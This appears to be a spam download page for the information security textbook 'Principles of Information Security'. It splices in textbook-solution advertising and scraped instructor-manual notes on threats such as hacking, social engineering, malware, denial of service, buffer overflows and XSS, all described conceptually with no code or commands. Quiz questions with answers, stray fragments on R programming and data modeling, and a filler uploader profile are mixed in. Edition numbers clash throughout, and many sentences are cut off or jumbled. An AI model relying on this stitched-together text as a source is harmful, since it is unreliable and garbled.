PDF | Specifically oriented to the needs of information systems students, PRINCIPLES OF INFORMATION SECURITY, 5e delivers the latest. Principles of Information Security,. Fourth Edition. Michael E. Whitman and. Herbert J. Mattord. Vice President Editorial, Career Education &. Training Solutions. About This Product. Specifically oriented to the needs of information systems students, PRINCIPLES OF INFORMATION SECURITY, 5e delivers the latest.

Principles Of Information Security 5th Edition Pdf

Language:English, Arabic, Japanese
Published (Last):29.10.2015
ePub File Size:21.42 MB
PDF File Size:16.27 MB
Distribution:Free* [*Registration needed]
Uploaded by: GIGI

Principles of Information Security Fifth Edition Michael E. Whitman, Ph.D., CISM, CISSP Herbert J. Mattord, Ph.D., CISM, CISSP Kennesaw State University. Fifth edition. Australia: Cengage Learning, pages, , English, Book; Illustrated, Principles of information security / Michael E. Whitman, Herbert J. Information security: let's be real. The text illustrates that information security in the modern organization is a problem for management to solve and not a problem.

Today, the internet brings millions of unsecured computer networks into continuous communication with each other. Solutions Manuals are available for thousands of the most popular college and high school textbooks in subjects such as Math, Science Physics , Chemistry , Biology , Engineering Mechanical , Electrical , Civil , Business and more.

It's easier to figure out tough problems faster using Chegg Study. Unlike static PDF Principles Of Information Security 5th Edition solution manuals or printed answer keys, our experts show you how to solve each problem step-by-step. No need to wait for office hours or assignments to be graded to find out where you took a wrong turn. You can check your reasoning as you tackle a problem using our interactive solutions viewer. Plus, we regularly update and improve textbook solutions based on student ratings and feedback, so you can be sure you're getting the latest information available.

Our interactive player makes it easy to find solutions to Principles Of Information Security 5th Edition problems you're working on - just go to the chapter for your book.

Hit a particularly tricky question? Bookmark it to easily review again before an exam. The best part? As a Chegg Study subscriber, you can view available interactive solutions manuals for each of your classes for one low monthly price. Why download extra books when you can get all the homework help you need in one place?

You bet! Just post a question you need help with, and one of our experts will provide a custom solution. You can also find solutions immediately by searching the millions of fully answered study questions in our archive. You can download our homework help app on iOS or Android to access solutions manuals on your mobile device. Asking a study question in a snap - just take a pic. Textbook Solutions. Principles of Information Security 5th Edition Edit edition.

Looking for the textbook? Communications and Other Service Provider Issues 1. Describe communications and other service provider issues: other utility services can impact organizations as well. Among these are telephone, water, wastewater, trash pickup, cable television, natural or propane gas, and custodial services. The loss of these services can impair the ability of an organization to function properly. Power Irregularities 1.


Describe power irregularities: irregularities from power utilities are common and can lead to fluctuations, such as power excesses, power shortages, and power losses.

In the U. Explain that voltage levels can spike momentary increase , surge prolonged increase , sag momentary decrease , brownout prolonged drop in voltage , fault momentary complete loss of power or blackout a more lengthy loss of power.

Note that because sensitive electronic equipment—especially networking equipment, computers, and computer-based systems—are susceptible to fluctuations, controls should be applied to manage power quality. Espionage or Trespass 1.

Explain that this threat represents a well-known and broad category of electronic and human activities that breach the confidentiality of information. Explain that when an unauthorized individual gains access to the information an organization is trying to protect, that act is categorized as a deliberate act of espionage or trespass.

Point out that some information-gathering techniques are legal and are called competitive intelligence. Note that instances of shoulder surfing occur at computer terminals, desks, ATM machines, smartphones, or other places where a person is accessing confidential information.

Hackers 1. Discuss that the act of trespassing can lead to unauthorized, real, or virtual actions that enable information gatherers to enter premises or systems they have not been authorized to enter. Discuss that the classic perpetrator of deliberate acts of espionage or trespass is the hacker.

In the gritty world of reality, a hacker uses skill, guile, or fraud to attempt to bypass the controls placed around information that is the property of someone else. The hacker frequently spends long hours examining the types and structures of the targeted systems. Remind students that there are generally two skill levels among hackers.

The first is the expert hacker, who develops software scripts and program exploits used by the second category, the novice, or unskilled hacker.

From the Publisher

Explain that the expert hacker is usually a master of several programming languages, networking protocols, and operating systems and also exhibits a mastery of the technical environment of the chosen targeted system. Point out to students that expert hackers have become bored with directly attacking systems and have turned to writing software.

The software they write are automated exploits that allow novice hackers to become script kiddies or packet monkeys — hackers of limited skill who use expertly written software to exploit a system, but do not fully understand or appreciate the systems they hack.

Discuss the term privilege escalation. Explain that a common example of privilege escalation is called jailbreaking or rooting. Hacker Variants 1. Explain that password attacks fall under the category of espionage. Point out that attempting to guess or calculate a password is often called cracking.

Discuss how forces of nature, force majeure, or acts of God pose some of the most dangerous threats, because they are unexpected and can occur with very little warning. Explain that these threats can disrupt not only the lives of individuals, but also the storage, transmission, and use of information.

Since it is not possible to avoid many of these threats, management must implement controls to limit damage and also prepare contingency plans for continued operations. Discuss the following examples of force of nature threats: a. Fire b. Flood c. Earthquake d. Lightning e. Landslides or mudslides f. Tornados or severe windstorms g. Hurricanes, typhoons, and tropical depressions h. Tsunamis i. Electrostatic discharge ESD j. Dust contamination k. Solar activity Human Error or Failure 1.

CSE 4471: Information Security

Describe this category and note that includes the possibility of acts performed without intent or malicious purpose by an individual who is an employee of an organization. Discuss the fact that employees constitute one of the greatest threats to information security, as they are the individuals closest to the organizational data.

Employee mistakes can easily lead to the following: revelation of classified data, entry of erroneous data, accidental deletion or modification of data, storage of data in unprotected areas, and failure to protect information. Note that many threats can be prevented with controls, ranging from simple procedures, such as requiring the user to type a critical command twice, to more complex procedures, such as the verification of commands by a second party. Principles of Information Security, 6th Edition Teaching Tip Systems fail for a variety of reasons, but proper procedures that ensure the ability to recover to a known good state.

The most important aspect of any information security program is to ensure that the organization has a comprehensive continuity planning process. Social Engineering 1. Note that within the context of information security, social engineering is the process of using social skills to convince people to reveal access credentials or other valuable information to the attacker. Explain that people are the weakest link. You can have the best technology; firewalls, intrusion-detection systems, biometric devices Discuss the social engineering attack known as the advance-fee fraud AFF.

Explain that phishing is an attempt to gain personal or financial information from an individual, usually by posing as a legitimate entity. Note that a variant is spear phishing, a label that applies to any highly targeted phishing attack. While normal phishing attacks target as many recipients as possible, a spear phisher sends a message that appears to be from an employer, a colleague, or other legitimate correspondent, to a small group, or even one specific person.

Discuss that phishing attacks use two primary techniques, often used in combination with one another: URL manipulation and Web site forgery.

Point out another form of social engineering is called pretexting, which is sometimes referred to as phone phishing. Information Extortion 1. Describe how the threat of information extortion involves the possibility of an attacker or trusted insider stealing information from a computer system and demanding compensation for its return or for an agreement to not disclose the information.

Extortion is common in credit card number theft.

This category of threat involves the deliberate sabotage of a computer system or business, or acts of vandalism to either destroy an asset or damage the image of an organization.

Emphasize that these threats can range from petty vandalism by employees to organized sabotage against an organization. Online Activism 1.

Compared to Web site defacement, vandalism within a network is more malicious in intent and less public. Explain that security experts are noticing a rise in another form of online vandalism, hacktivist or cyberactivist operations. A more extreme version is referred to as cyberterrorism. Compare cyberterrorism to more positive online activism, such as using Facebook, Twitter, etc. Quick Quiz 1 1. True or False: The three communities of interest are general management, operations management, and information security management.

Answer: False 2. Hackers of limited skill who use expertly written software to attack a system are known as which of the following? Which of the following occurs when an attacker or trusted insider steals information from a computer system and demands compensation for its return or for an agreement not to disclose it? Information extortion b. Technological extortion c.

Insider trading d. Information hording Answer: A 4. Which type of attacker will hack systems to conduct terrorist activities via network or Internet pathways? Principles of Information Security, 6th Edition a. Cyberhackers b. Electronic terrorists c.

Cyberterrorists d. Electronic hackers Answer: C 5. Answer: True Software Attacks 1. Emphasize that an attack is a deliberate act that exploits a vulnerability to compromise a controlled system.

Principles of Information Security

This attack can consist of specially crafted software that attackers trick users into installing on their systems. Teaching Tip You should pause now to ensure that students understand the difference between threats, vulnerabilities, exploits, and attacks. Verify that students understand how these terms combine and transition. Malware 1. Describe malware as malicious code or malicious software. Point out that other attacks that use software, like redirect attacks and denial-of-service attacks, also fall under this threat.

Note that the malicious code attack includes the execution of viruses, worms, Trojan horses, and active Web scripts with the intent to destroy or steal information.

Explain that the polymorphic, or multivector, worm is a state-of-the-art attack system. Point out that these attack programs use up to six known attack vectors to exploit a variety of vulnerabilities in commonly found information system devices.

Point out to students that when an attack makes use of malware that is not yet known by the anti-malware software companies, it is said to be a zero-day attack. Use Table to review some of the most dangerous malware attacks to date. Principles of Information Security, 6th Edition Virus 1. Explain that a computer virus consists of code segments that perform malicious actions. Point out to students that one of the most common methods of virus transmission is via e-mail attachments.

Mention that viruses can be classified by how they spread themselves. Discuss the most common types of information system viruses, which are the macro virus and the boot virus. Explain the classification known as memory-resident and non-memory-resident viruses. Note that resident viruses are capable of reactivating when the computer is booted and continuing their actions until the system is shut down.

Worms 1. Describe worms as viruses that can continue replicating themselves until they completely fill available resources. Use Figure to discuss the Nimda and Sircam worms. Trojan Horses 1. Explain that Trojan horses are frequently disguised as helpful or necessary pieces of software, such as the readme.

Use Figure in your discussion. Polymorphic Threats 1. Explain that a polymorphic threat evolves and changes size and other external file characteristics in order to elude detection by antivirus software programs. Virus and Worm Hoaxes 1.

Explain that a more devious approach to attacking computer systems is the transmission of a virus hoax. Back Doors 1. Discuss how using a known or previously unknown and newly discovered access mechanism, an attacker can gain access to a system or network resource through a back door.

Point out that these doors are often referred to as a maintenance hook. Explain that a denial-of-service attack begins when an attacker sends a large number of connection or information requests to a target. So many requests are made that the target system cannot handle them successfully along with other legitimate requests for service.

This may result in the system crashing or simply becoming unable to perform ordinary functions. Define a distributed denial-of-service attack as one in which a coordinated stream of requests is launched against a target from many locations at the same time. Explain how compromised machines are turned into bots or zombies which can be directed remotely by the attacker in order to participate in the attack.

Principles of Information Security

E-mail Attacks 1. Note that spam is unsolicited commercial e-mail. While many consider spam a nuisance rather than an attack, it is emerging as a vector for some attacks.

Explain that mail bombing is another form of e-mail attack that is also a DoS, in which an attacker routes large quantities of e-mail to the target.

Communications Interception Attacks 1. Explain that common software-based communications attacks include several subcategories designed to intercept and collect information in transit. Point out to students that the emergence of the Internet of Things IoT increases the possibility of these types of attacks.

Packet Sniffer 1. Describe a sniffer as a program or a device that can monitor data traveling over a network. It can be used both for legitimate network management functions and for stealing information from a network. Spoofing 1. Emphasize that spoofing is a technique used to gain unauthorized access to computers, wherein the intruder sends messages to a computer containing an IP address that indicates that the messages are coming from a trusted host.

Pharming 1. Explain that an attacker sniffs packets from the network, modifies them, and inserts them back into the network. Point out that in a TCP hijacking attack, the attacker uses address spoofing to impersonate other legitimate entities on the network. Mention that this is also known as session hijacking. Teaching Tip Many students will find this the most interesting part of the chapter.

Make sure you cover the ethical and legal implications of these attack descriptions.

Technical Hardware Failures or Errors 1. Emphasize that technical hardware failures or errors occur when a manufacturer distributes to users equipment containing a known or unknown flaw. These defects can cause the system to perform outside of expected parameters, resulting in unreliable or unavailable service.

Discuss that some errors are terminal in that they result in the unrecoverable loss of the equipment. Some errors are intermittent in that they only periodically manifest themselves, resulting in faults that are not easily repeated.

Discuss the Intel Pentium II chip failure. Point out that it is one of the best-known hardware failures to date.

Mean Time Between Failure 1. Technical Software Failures or Errors 1. Explain that this category involves threats that come from downloading software with unknown, hidden faults. Large quantities of computer code are written, debugged, published, and sold before all of their bugs are detected and resolved. Discuss how combinations of certain software and hardware can reveal new bugs.

Planning is the foundation of information security empowering an organization to achieve and maintain a secure state. The Deadly Sins in Software Security 1.

Explain that some software development problems result in software that is difficult or impossible to deploy in a secure fashion.

There are 24 problem areas or categories in software development which is also called software engineering. Describe buffer overruns, which are when buffers are used when there is a mismatch in the processing rates between two entities involved in a communication process.

A buffer overrun or buffer overflow is an application error that occurs when more data is sent to a program buffer than it is designed to handle. During a buffer overrun, an attacker can make the target system execute instructions, or the attacker can take advantage of some other unintended consequence of the failure. Explain that effective software has the ability to catch and resolve exceptions, which are unusual situations that require special processing.

Define command injection and explain that a command injection problems occur when user input is passed directly to a compiler or interpreter.

Define cross-site scripting XSS , which occurs when an application running on a Web server gathers data from a user in order to steal it.

Explain that failure to handle errors can cause a variety of unexpected system behaviors. Programmers are expected to anticipate problems and prepare their application code to handle them. Principles of Information Security, 6th Edition 7. Describe the failure to protect network traffic and explain that with the growing popularity of wireless networking comes a corresponding increase in the risk that wirelessly transmitted data will be intercepted.

Most wireless networks are installed and operated with little or no protection for the information that is broadcast between the client and the network wireless access point. Without appropriate encryption such as that afforded by WPA , attackers can intercept and view your data.

Traffic on a wired network is also vulnerable to interception in some situations. Explain the failure to store and protect data securely. Programmers are responsible for integrating access controls into, and keeping secret information out of, programs. Access controls regulate who, what, when, where and how individuals and systems interact with data. Discuss the failure to use cryptographically strong random numbers. Many computer systems use random number generators.

Describe format string problems. Define improper file access. If attackers change the expected location of a file, by intercepting and modifying a program code call, they can force a program to use their own files rather than the files the program is supposed to use.

The potential for damage or disclosure is extreme, so it is critical to protect the location of the files, as well as the method and communications channels by which these files are accessed. Discuss the improper use of SSL. Programmers use Secure Socket Layer SSL to transfer sensitive data such as credit card numbers and other personal information between a client and server.

Explain that information leakage is one of the most common methods of obtaining inside and classified information is directly or indirectly from an individual, usually an employee.

By warning employees against disclosing information, organizations can protect the secrecy of their operation. Principles of Information Security, 6th Edition Although paper-and-pencil can deal with arbitrary numbers of digits, the binary representations used by computers are of a particular fixed length. Integer bugs are usually exploited indirectly—that is, triggering an integer bug enables an attacker to corrupt other areas of memory, gaining control of an application.Principles of Information Security 5th ed.

Share this link with a friend: R Programming 12 Try it Option Online You really do not need to set up your own environment to start learning R programming language.

Dictionary for text mining can be compared to maps while travelling in a new city. Teaching Tip It is quite easy to get the conceptual underpinning of threats and attacks see the following section confused. There are 24 problem areas or categories in software development which is also called software engineering. Data modeling is performed to define data requirements of an information system in supporting business processes.

This section includes various free downloads, including whitepapers, reports, presentation slides, and other valuable resources that will help professionals. Whitman served the U.

VELMA from Portsmouth
Please check my other posts. One of my extra-curricular activities is creeking. I enjoy studying docunments frenetically .